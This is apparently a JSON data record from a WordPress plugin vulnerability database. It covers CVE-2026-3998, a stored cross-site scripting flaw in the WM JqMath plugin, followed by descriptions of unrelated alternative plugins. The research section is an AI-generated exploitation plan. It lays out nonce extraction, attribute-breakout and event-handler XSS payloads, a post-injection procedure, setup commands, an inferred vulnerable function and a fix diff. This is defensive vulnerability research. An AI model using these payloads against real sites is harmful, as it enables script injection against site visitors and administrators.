[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fdtIFHck5gAqd7K6AN2MCiu4-6ZHOlK7Dsz4LskesMvQ":3,"$fIc0EwNM3kqk2aAs4w7cm0-L-WB143VvwM8u76qgZf08":217},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":23,"download_link":24,"security_score":25,"vuln_count":14,"unpatched_count":14,"last_vuln_date":26,"fetched_at":27,"vulnerabilities":28,"developer":55,"crawl_stats":34,"alternatives":60,"analysis":165,"fingerprints":198},"wm-jqmath","WM JqMath","1.3","webmind.pt","https:\u002F\u002Fprofiles.wordpress.org\u002Fwebmindpt\u002F","\u003Cp>WM jqMath plugin is a very simple plugin that adds the jqMath library and styles.\u003C\u002Fp>\n\u003Cp>You will be able to add math formulas by directly entering the standard syntax of jqMath or by using a shortcode where you can also add CSS styles.\u003C\u002Fp>\n\u003Cp>Current WM jqMath features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Insert directly a jqMath expression on your post or page like: $$y={-b±√{b^2-4ac}}\u002F{2a}$$\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Insert a jqMath using a shortcode with CSS styles like: [jqmath expr=”$$y={-b±√{b^2-4ac}}\u002F{2a}$$” style=”color: navy; font-size: 20pt”]\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>In order to enable jqMath for your post, you need to add the shortcode [enable_jqmath] at the beginning of your post.\u003C\u002Fp>\n\u003Cp>The jqMath library was written by Dave Barton from Mathscribe. 
You can find further information regarding jqMath by clicking \u003Ca href=\"http:\u002F\u002Fwww.mathscribe.com\u002Fauthor\u002Fjqmath.html\" rel=\"nofollow ugc\">here\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>We want to thank Dave for developing this great library!\u003C\u002Fp>\n","Create math formulas on your posts and pages using jqMath from MathScribe",20,1884,100,1,"2015-08-05T01:49:00.000Z","4.2.39","3.3","",[20,21,22],"jqmath","webmind","wm","http:\u002F\u002Fwebmind.pt\u002Fportfolio\u002Fwm-jqmath\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwm-jqmath.1.3.zip",63,"2026-04-14 19:46:51","2026-04-06T09:54:40.288Z",[29],{"id":30,"url_slug":31,"title":32,"description":33,"plugin_slug":4,"theme_slug":34,"affected_versions":35,"patched_in_version":34,"severity":36,"cvss_score":37,"cvss_vector":38,"vuln_type":39,"published_date":26,"updated_date":40,"references":41,"days_to_patch":34,"patch_diff_files":43,"patch_trac_url":34,"research_status":44,"research_verified":45,"research_rounds_completed":46,"research_plan":47,"research_summary":48,"research_vulnerable_code":49,"research_fix_diff":50,"research_exploit_outline":51,"research_model_used":52,"research_started_at":53,"research_completed_at":54,"research_error":34,"poc_status":34,"poc_video_id":34,"poc_summary":34,"poc_steps":34,"poc_tested_at":34,"poc_wp_version":34,"poc_php_version":34,"poc_playwright_script":34,"poc_exploit_code":34,"poc_has_trace":45,"poc_model_used":34,"poc_verification_depth":34},"CVE-2026-3998","wm-jqmath-authenticated-contributor-stored-cross-site-scripting-via-style-shortcode-attribute","WM JqMath \u003C= 1.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'style' Shortcode Attribute","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' shortcode attribute of the [jqmath] shortcode in all versions up to and including 1.3. 
This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The generate_jqMathFormula() function directly concatenates the 'style' attribute value into an HTML style attribute without applying esc_attr() or any other escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",null,"\u003C=1.3","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 08:28:16",[42],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb4aebb45-b47b-4b5a-8281-400a4b786689?source=api-prod",[],"researched",false,3,"## Vulnerability Analysis: CVE-2026-3998 - Stored XSS in WM JqMath\n\n### 1. Vulnerability Summary\nThe **WM JqMath** plugin (versions \u003C= 1.3) contains a stored cross-site scripting (XSS) vulnerability within the handling of its `[jqmath]` shortcode. Specifically, the function `generate_jqMathFormula()` processes attributes passed to the shortcode. The `style` attribute is accepted from user input and concatenated directly into an HTML `\u003Cspan>` or `\u003Cdiv>` tag's `style` attribute without being passed through `esc_attr()` or similar sanitization. This allows an authenticated user with at least \"Contributor\" privileges (who can create posts) to inject arbitrary HTML attributes or break out of the `style` attribute to inject `\u003Cscript>` tags.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[jqmath]`\n*   **Vulnerable Attribute:** `style`\n*   **Authentication Level:** Contributor or higher. 
Contributors can create and save posts but cannot publish them; however, the XSS will execute when an Administrator or Editor previews the post or if the post is published.\n*   **Payload Location:** The payload is embedded within the `style` attribute of the shortcode inside the post content.\n*   **Endpoint:** Standard WordPress post creation\u002Fediting (`\u002Fwp-admin\u002Fpost.php` or REST API `\u002Fwp\u002Fv2\u002Fposts`).\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode in the main plugin file (likely `wm-jqmath.php`):\n    `add_shortcode('jqmath', 'generate_jqMathFormula');`\n2.  **Attribute Parsing:** When a post containing `[jqmath]` is rendered, WordPress calls `generate_jqMathFormula($atts, $content)`.\n3.  **Processing:** Inside `generate_jqMathFormula()`:\n    *   The `$atts` array is processed (possibly using `shortcode_atts`).\n    *   The value of `$atts['style']` is retrieved.\n4.  **Sink:** The value is concatenated into an HTML string:\n    `return '\u003Cspan style=\"' . $atts['style'] . '\">' . $formula_markup . '\u003C\u002Fspan>';` (inferred)\n5.  **Output:** The unescaped string is returned to the WordPress content filter and rendered in the browser.\n\n### 4. Nonce Acquisition Strategy\nTo exploit this as an authenticated Contributor via the web interface, the agent must obtain a valid post-editing nonce.\n\n1.  **Login:** Use the `http_request` tool to authenticate as a Contributor.\n2.  **Access Post Creator:** Navigate to `wp-admin\u002Fpost-new.php`.\n3.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` required for the `sample-permalink` or the primary post-saving action.\n    *   `_wpnonce` is typically found in the `#_wpnonce` input field.\n    *   Command: `browser_eval(\"document.querySelector('#_wpnonce').value\")`\n4.  
**Alternative (REST API):** If the Block Editor is used, the agent can extract the REST nonce from the `wpApiSettings` object:\n    *   Command: `browser_eval(\"window.wpApiSettings?.nonce\")`\n\n### 5. Exploitation Strategy\nThe goal is to inject a `\u003Cscript>` tag by breaking out of the `style` attribute.\n\n**Step-by-step Plan:**\n\n1.  **Authentication:** Authenticate the agent as a user with the `contributor` role.\n2.  **Payload Construction:**\n    *   The target context is `\u003Cspan style=\"[USER_INPUT]\">`.\n    *   Payload: `\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    *   Full Shortcode: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n3.  **Post Creation:**\n    *   Use the `http_request` tool to send a POST request to `\u002Fwp-admin\u002Fpost.php`.\n    *   **Action:** `editpost`\n    *   **Parameters:**\n        *   `post_ID`: (The ID of a newly created draft)\n        *   `_wpnonce`: (Extracted in Step 4)\n        *   `content`: `[jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']test[\u002Fjqmath]`\n        *   `post_title`: `XSS Test`\n4.  **Execution:** Navigate to the permalink of the draft post or use the \"Preview\" functionality.\n5.  **Confirmation:** Check the response body for the unescaped script tag.\n\n### 6. Test Data Setup\nBefore exploitation, ensure the environment is ready:\n1.  **Plugin Activation:** Verify `wm-jqmath` is installed and active.\n2.  **User Creation:** Create a contributor user:\n    `wp user create contributor_attacker attacker@example.com --role=contributor --user_pass=password123`\n3.  **Target Post:** Create a blank draft post for the contributor to edit:\n    `wp post create --post_type=post --post_status=draft --post_author=$(wp user get contributor_attacker --field=ID) --post_title=\"Draft\"`\n\n### 7. 
Expected Results\n*   **Injected Content:** When viewing the source of the rendered post, the output should look like:\n    `\u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>`\n*   **Execution:** A browser navigating to the post should trigger the `alert(document.domain)` JavaScript.\n\n### 8. Verification Steps\n1.  **WP-CLI Verification:** After the HTTP request, verify the content is stored in the database:\n    `wp post get [POST_ID] --field=post_content`\n    Confirm it contains the payload exactly as sent.\n2.  **Frontend Check:** Use `browser_navigate` to the post's URL and check for the alert or the existence of the script tag in the DOM:\n    `browser_eval(\"document.querySelector('script').textContent.includes('alert')\")`\n\n### 9. Alternative Approaches\nIf breaking out of the `style` attribute with `\">` is blocked or fails due to specific quote handling:\n1.  **Attribute Injection:** Inject an `onmouseover` event if the `style` attribute value is placed inside a tag but not properly enclosed:\n    *   Payload: `x\" onmouseover=\"alert(1)`\n    *   Shortcode: `[jqmath style='x\" onmouseover=\"alert(1)']`\n2.  **CSS-Based XSS (Legacy Browsers):** If direct script injection is filtered but the style attribute is kept, attempt:\n    *   Payload: `background-image: url(\"javascript:alert(1)\")` (Note: This is rarely effective in modern browsers but confirms the lack of sanitization).\n3.  **Attribute Breakout (Single Quote):** If the plugin wraps the attribute in single quotes:\n    *   Payload: `';>\u003Cscript>alert(1)\u003C\u002Fscript>`","The WM JqMath plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'style' attribute in the [jqmath] shortcode. 
This occurs because the plugin fails to sanitize or escape the user-supplied 'style' attribute value before outputting it in an HTML tag, allowing Contributor-level users to inject arbitrary JavaScript.","\u002F\u002F wm-jqmath.php (inferred location based on research plan)\n\u002F\u002F Within the function generate_jqMathFormula($atts, $content)\n\nfunction generate_jqMathFormula($atts, $content) {\n    $atts = shortcode_atts( array(\n        'style' => '',\n        'display' => 'inline'\n    ), $atts );\n\n    \u002F\u002F ... processing formula content ...\n\n    if ($atts['display'] == 'block') {\n        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n    } else {\n        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n    }\n}","--- wm-jqmath.php\n+++ wm-jqmath.php\n@@ -10,9 +10,10 @@\n         'display' => 'inline'\n     ), $atts );\n \n+    $safe_style = esc_attr($atts['style']);\n     if ($atts['display'] == 'block') {\n-        return '\u003Cdiv style=\"' . $atts['style'] . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n+        return '\u003Cdiv style=\"' . $safe_style . '\">$$' . $content . '$$\u003C\u002Fdiv>';\n     } else {\n-        return '\u003Cspan style=\"' . $atts['style'] . '\">$' . $content . '$\u003C\u002Fspan>';\n+        return '\u003Cspan style=\"' . $safe_style . '\">$' . $content . '$\u003C\u002Fspan>';\n     }\n }","The exploit requires an attacker to have at least Contributor-level privileges to create or edit posts. 1. The attacker logs into the WordPress dashboard and creates a new post or edits a draft. 2. In the post editor, the attacker inserts the [jqmath] shortcode with a malicious 'style' attribute payload designed to break out of the HTML attribute, such as: [jqmath style='\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>']formula[\u002Fjqmath]. 3. 
When the post is saved or previewed by an administrator or viewed by any visitor, the unescaped payload is rendered directly into the page source as \u003Cspan style=\"\";>\u003Cscript>alert(document.domain)\u003C\u002Fscript>\">...\u003C\u002Fspan>, causing the script to execute in the victim's browser.","gemini-3-flash-preview","2026-04-16 15:39:41","2026-04-16 15:40:02",{"slug":56,"display_name":7,"profile_url":8,"plugin_count":14,"total_installs":11,"avg_security_score":25,"avg_patch_time_days":57,"trust_score":58,"computed_at":59},"webmindpt",30,68,"2026-04-18T19:27:03.514Z",[61,86,105,126,146],{"slug":62,"name":63,"version":64,"author":65,"author_profile":66,"description":67,"short_description":68,"active_installs":69,"downloaded":70,"rating":71,"num_ratings":72,"last_updated":73,"tested_up_to":74,"requires_at_least":75,"requires_php":76,"tags":77,"homepage":18,"download_link":83,"security_score":13,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"woo-jtl-connector","JTL-Connector for WooCommerce","2.4.1","ntbyk","https:\u002F\u002Fprofiles.wordpress.org\u002Fntbyk\u002F","\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002Fk6xv8LsR15w?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Cp>With JTL-Connector for WooCommerce, you can connect your WooCommerce online shop with the\u003Cbr \u002F>\nfree JTL-Wawi ERP system by JTL-Software. 
The ERP system as well as the entire JTL product\u003Cbr \u002F>\nfamily are perfectly suited to the requirements of e-commerce and mail order businesses.\u003Cbr \u002F>\nThey help you to process more orders in a shorter time and offer a range of exciting functionalities.\u003C\u002Fp>\n\u003Cp>With JTL-Connector, you have access to the complete JTL product family. Use JTL-Connector to transfer\u003Cbr \u002F>\nthe data from your existing WooCommerce shop to our ERP system. From now on, you can manage your online\u003Cbr \u002F>\nshop and your entire business with JTL-Wawi and profit from an efficient process chain that comprises\u003Cbr \u002F>\neverything from purchase to shipping and returns.\u003C\u002Fp>\n\u003Cp>JTL-Wawi and JTL-Connector are out-of-the-box solutions that use a lot of the functions that your\u003Cbr \u002F>\nWooCommerce shops use, too. Further functions can be individually programmed and added using JTL-Connector.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fanbindung-shopsysteme\" rel=\"nofollow ugc\">Further information on JTL-Connector, a connector for third party shops\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Why use an ERP system?\u003C\u002Fh3>\n\u003Cp>The free JTL-Wawi ERP system allows you to manage your business centrally with a single software.\u003Cbr \u002F>\nTransfer data from existing applications quickly and connect with a variety of online shop systems.\u003C\u002Fp>\n\u003Cp>Synchronise item data, orders and stocks in a centralised ERP software. System discontinuities, which\u003Cbr \u002F>\nare common with other solutions, can be significantly reduced with a leading ERP system such as JTL-Wawi.\u003Cbr \u002F>\nThe software allows you to easily keep track of all your sales channels. 
You can also automate your\u003Cbr \u002F>\nprocesses and deal with complex tax issues.\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\" rel=\"nofollow ugc\">Further information on the ERP system JTL-Wawi\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fjtl-wawi-download\" rel=\"nofollow ugc\">Download JTL-Wawi for free\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>PROFIT FROM THE ENTIRE JTL PRODUCT FAMILY\u003C\u002Fh3>\n\u003Cp>If you wish to optimise other aspects of your work, you can always choose more products from our\u003Cbr \u002F>\nextensive portfolio—no matter whether you want to enhance efficiency in sales, in the warehouse or in shipping.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Control your online shop with JTL-Wawi\u003C\u002Fli>\n\u003Cli>Multichannel distribution: sell on Amazon and eBay with JTL-eazyAuction\u003C\u002Fli>\n\u003Cli>Efficiently handle shipments and returns with the free JTL-Packing Bench+\u003C\u002Fli>\n\u003Cli>Print shipping labels for your logistics providers with JTL-Shipping\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fe-commerce-loesungen\" rel=\"nofollow ugc\">Overview of the JTL product family\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Many sellers also use JTL-Connector to transfer their data to JTL-Wawi and test our\u003Cbr \u002F>\nproprietary online shop system \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fonline-shopsystem\" rel=\"nofollow ugc\">JTL-Shop\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>STARTING EASY WITH STANDARD VERSIONS\u003C\u002Fh3>\n\u003Cp>Sellers often use standard shop systems without personalised features, plug-ins and added functions.\u003Cbr \u002F>\nOut-of-the-box shops like these can be connected to JTL-Wawi with a few simple steps using JTL-Connector.\u003C\u002Fp>\n\u003Ch3>CONNECTING INDIVIDUAL PLUG-INS\u003C\u002Fh3>\n\u003Cp>You have made individual 
adjustments to your shop, e.g. the installation of plug-ins? In this case,\u003Cbr \u002F>\nJTL-Connector needs an individual configuration for each of the plug-ins. To facilitate this, JTL-Connector\u003Cbr \u002F>\nfeatures an integrated \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fanbindung-shopsysteme#plugin-system-fuer-individualisierte-onlineshops\" rel=\"nofollow ugc\">plug-in interface\u003C\u002Fa>,\u003Cbr \u002F>\nenabling the transfer of personalised data and functions to JTL-Wawi.\u003C\u002Fp>\n\u003Ch3>HOW IT WORKS\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Initial data synchronisation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>In the course of the initial synchronisation, data such as items, categories, images and customer and\u003Cbr \u002F>\norder information is transferred from your shop to JTL-Wawi. If you want to use JTL-Wawi as the leading\u003Cbr \u002F>\nsystem, you can directly and exclusively manage your products and process your online shop orders in\u003Cbr \u002F>\nJTL-Wawi right after the initial synchronisation.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Individual data maintenance\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Many of the performance features that JTL-Wawi offers can also be used in your online shop via the\u003Cbr \u002F>\nJTL-Connector, provided your shop system also offers these functionalities. Some functionalities of\u003Cbr \u002F>\nyour online shops are not transferred by JTL-Connector by default. Those can be added individually via\u003Cbr \u002F>\nplug-ins or additional programming.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Continuous synchronisation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>The data created or changed by you in JTL-Wawi is transferred to your shop via the\u003Cbr \u002F>\nonline shop synchronisation. Orders placed in your shop are directly forwarded to JTL-Wawi.\u003Cbr \u002F>\nYou can process all orders, including shipping and returns, in JTL-Wawi. 
The current order\u003Cbr \u002F>\nstatus is transferred to your shop via JTL-Connector. In this way, your customers are always\u003Cbr \u002F>\ninformed about the status of their orders.\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Combined operation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>You can also operate JTL-Connector and your shop in a combined mode. In this case, you define what\u003Cbr \u002F>\ndata is to be imported into JTL-Wawi or transferred to your online shop. You can specify, for example,\u003Cbr \u002F>\nthat JTL-Wawi only updates stocks for the shop and only imports orders. This means that you still maintain\u003Cbr \u002F>\nyour products in the back end of your online shop.\u003C\u002Fp>\n\u003Ch3>FUTURE-PROOF DEVELOPMENT\u003C\u002Fh3>\n\u003Cp>JTL-Software holds all the knowledge to ensure the future-proof development of the JTL connectors.\u003Cbr \u002F>\nThis know-how enables us to react quickly to changing requirements and to adapt JTL-Connector to\u003Cbr \u002F>\nevolving connected shop systems. 
This ensures trouble-free compatibility with future versions.\u003C\u002Fp>\n\u003Ch3>COMPLEMENTARY SOLUTIONS FROM THE JTL PRODUCT FAMILY\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Management of several online shops with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Ffunktionen\u002Fonlineshop-anbindung#mehrere-onlineshops-gleichzeitig-anbinden-via-multishop-modul\" rel=\"nofollow ugc\">MultiShop\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Shipping and returns with JTL-Packing \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fpackprozess-vereinfachen\" rel=\"nofollow ugc\">Bench+\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Automated processes with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fprozessoptimierung\" rel=\"nofollow ugc\">JTL-Workflows\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Import and export with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fwarenwirtschaft\u002Fimport-export\" rel=\"nofollow ugc\">JTL-Ameise\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Connection to Amazon and eBay with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fmarktplatz-schnittstelle\" rel=\"nofollow ugc\">JTL-eazyAuction\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Printing shipping labels with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Fversand-schnittstelle\" rel=\"nofollow ugc\">JTL-Shipping\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>Warehouse management with \u003Ca href=\"https:\u002F\u002Fwww.jtl-software.de\u002Flagerverwaltung\" rel=\"nofollow ugc\">JTL-WMS\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>TECHNICAL INSTRUCTIONS AND VIDEO TUTORIALS\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fguide.jtl-software.de\u002FKategorie:JTL-Connector:WooCommerce\" rel=\"nofollow ugc\">Documentation regarding JTL-Connector for WooCommerce\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca 
href=\"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=8DEX2xHoqtM&index=11&list=PL44cp2iiTsTXfN18-sZgAKIiaD2wSI4xl\" rel=\"nofollow ugc\">Video tutorials on the JTL connectors\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n","Extend your shop software, through this connector, with a full ERP with many features for marketplaces etc.",1000,138413,86,6,"2025-11-25T12:43:00.000Z","6.4.8","4.7","8.0",[78,79,80,81,82],"connector","erp","jtl","warenwirtschaft","wms","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-jtl-connector.2.4.1.zip",0,"2026-04-16T10:56:18.058Z",{"slug":87,"name":88,"version":89,"author":90,"author_profile":91,"description":92,"short_description":93,"active_installs":94,"downloaded":95,"rating":84,"num_ratings":84,"last_updated":96,"tested_up_to":97,"requires_at_least":98,"requires_php":18,"tags":99,"homepage":18,"download_link":103,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"wpml-short-code-translator","WPML Shortcode Translator","1.0","CloverValleyApps","https:\u002F\u002Fprofiles.wordpress.org\u002Fclovervalleyapps\u002F","\u003Cp>WPML.org has an excellent plugin to make WordPress sites multilingual. As well as powerful tools to manage the translation and translators.\u003C\u002Fp>\n\u003Cp>Reusable Text Blocks makes centralizing reusable text quick and easy.\u003Cbr \u002F>\nhttps:\u002F\u002Fwordpress.org\u002Fplugins\u002Freusable-text-blocks\u002F\u003C\u002Fp>\n\u003Cp>WPML doesn’t work with Reusable Text Blocks and other similar type plugins, resulting in messy workarounds.\u003C\u002Fp>\n\u003Cp>The solution was suggested on this thread:\u003Cbr \u002F>\nhttp:\u002F\u002Fwpml.org\u002Fforums\u002Ftopic\u002Fconditional-language-shortcode\u002F\u003C\u002Fp>\n\u003Cp>And so WPML Shortcode Translator was created so you can use the power of WPML anywhere. 
For example:\u003C\u002Fp>\n\u003Cp>[wpml_language language=”en”]Hello[\u002Fwpml_language] \u003Cbr \u002F>\n[wpml_language language=“ja”]こんにちは[\u002Fwpml_language]\u003C\u002Fp>\n\u003Cp>Enjoy.\u003C\u002Fp>\n","WPML.org plugin users now can use language detection shortcode anywhere, e.g. text blocks.",300,8892,"2014-12-20T16:19:00.000Z","4.1.0","3.0.1",[100,101,102],"shortcode-translator","smpl-shortcode","wmpl","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpml-short-code-translator.zip",85,{"slug":106,"name":107,"version":108,"author":109,"author_profile":110,"description":111,"short_description":112,"active_installs":113,"downloaded":114,"rating":84,"num_ratings":84,"last_updated":115,"tested_up_to":116,"requires_at_least":117,"requires_php":118,"tags":119,"homepage":122,"download_link":123,"security_score":124,"vuln_count":46,"unpatched_count":84,"last_vuln_date":125,"fetched_at":85},"viewmedica","ViewMedica 9","1.4.21","Swarm Interactive","https:\u002F\u002Fprofiles.wordpress.org\u002Fswarminteractive\u002F","\u003Cp>This plugin is to help embed the ViewMedica&reg; Patient Education system on your WordPress site. It will help prevent WYSIWYG editors from stripping out script and HTML code that is required by your ViewMedica embed. You can also generate a full patient education section on your site in seconds!\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Instantly Embed ViewMedica\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The ViewMedica plugin for WordPress adds a button to the WYSIWYG editor which allows you to instantly embed any video in your account. Simply click the button, select your video and press Embed.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Create a page with links to your ViewMedica content\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>Use the plugin’s Page Generator to instantly make a Web page that features all of your ViewMedica videos. 
You can choose to show your video links in list form, or with a thumbnail image and description.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Change ViewMedica player settings globally\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The Global Options settings change the behavior of ViewMedica across your entire site. Set things like your player width, default language and other features.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Change player settings for a single embed\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>The Inline Options settings give you control of individual ViewMedica embeds on your site. For example, you may want to disable menu access on a page so your users only see one specific video. Checkout the Shortcode Generator to see the options available, or head to a post and use our inline tool.\u003C\u002Fp>\n\u003Ch3>Download\u003C\u002Fh3>\n\u003Cp>Download the latest release of the plugin at https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fviewmedica\u002F\u003C\u002Fp>\n","ViewMedica 9 for WordPress Instantly embed your ViewMedica On-Demand in to your website",200,12471,"2025-02-24T16:08:00.000Z","6.1.10","3.0.0","5.2.4",[120,121,106],"medical","videos","http:\u002F\u002Fviewmedica.com\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fviewmedica.1.4.21.zip",90,"2025-01-14 16:50:48",{"slug":127,"name":128,"version":129,"author":130,"author_profile":131,"description":132,"short_description":133,"active_installs":13,"downloaded":134,"rating":84,"num_ratings":84,"last_updated":135,"tested_up_to":136,"requires_at_least":137,"requires_php":18,"tags":138,"homepage":144,"download_link":145,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"remove-links-and-scripts","Remove Links and Scripts","0.2.4","Sami Ahmed Siddiqui","https:\u002F\u002Fprofiles.wordpress.org\u002Fsasiddiqui\u002F","\u003Cp>This plugin can remove the links, scripts, styles and some other meta from the wordpress header as listed 
below:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>shortlink\u003C\u002Fli>\n\u003Cli>rsd_link\u003C\u002Fli>\n\u003Cli>wlwmanifest_link\u003C\u002Fli>\n\u003Cli>feed_links\u003C\u002Fli>\n\u003Cli>emoji_scripts\u003C\u002Fli>\n\u003Cli>wp_embed \u003C\u002Fli>\n\u003Cli>wp_json\u003C\u002Fli>\n\u003Cli>emoji_styles \u003C\u002Fli>\n\u003Cli>generator\u003C\u002Fli>\n\u003Cli>rel_link\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>All the above headers can be removed from this plugin. You can select them from the settings page.\u003C\u002Fp>\n\u003Ch4>Make sure to check the settings Page\u003C\u002Fh4>\n\u003Ch3>Thanks for the Support\u003C\u002Fh3>\n\u003Cp>The support from the users that love Remove Links and Scripts is huge. You can support Remove Links and Scripts future development and help to make it even better by donating or even giving a 5 star rating with a nice message to me 🙂\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.paypal.me\u002Fyasglobal\" rel=\"nofollow ugc\">Donate to Remove Links and Scripts\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>Bug reports\u003C\u002Fh3>\n\u003Cp>Bug reports for Remove Links and Scripts are \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fyasglobal\u002Fremove-links-and-scripts\" rel=\"nofollow ugc\">welcomed on GitHub\u003C\u002Fa>. 
Please note GitHub is not a support forum, and issues that aren’t properly qualified as bugs will be closed.\u003C\u002Fp>\n","Remove unwanted links and scripts from wordpress header.",3787,"2018-01-26T06:53:00.000Z","4.9.29","3.5",[139,140,141,142,143],"emoji_scripts","feed_links","rsd_link","shortlink","wlwmanifest_link","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fremove-links-and-scripts\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fremove-links-and-scripts.0.2.4.zip",{"slug":147,"name":148,"version":149,"author":150,"author_profile":151,"description":152,"short_description":153,"active_installs":124,"downloaded":154,"rating":84,"num_ratings":84,"last_updated":155,"tested_up_to":156,"requires_at_least":98,"requires_php":18,"tags":157,"homepage":163,"download_link":164,"security_score":104,"vuln_count":84,"unpatched_count":84,"last_vuln_date":34,"fetched_at":85},"clean-up-wp-head","Clean up wp_head","0.2.1","Fredrik 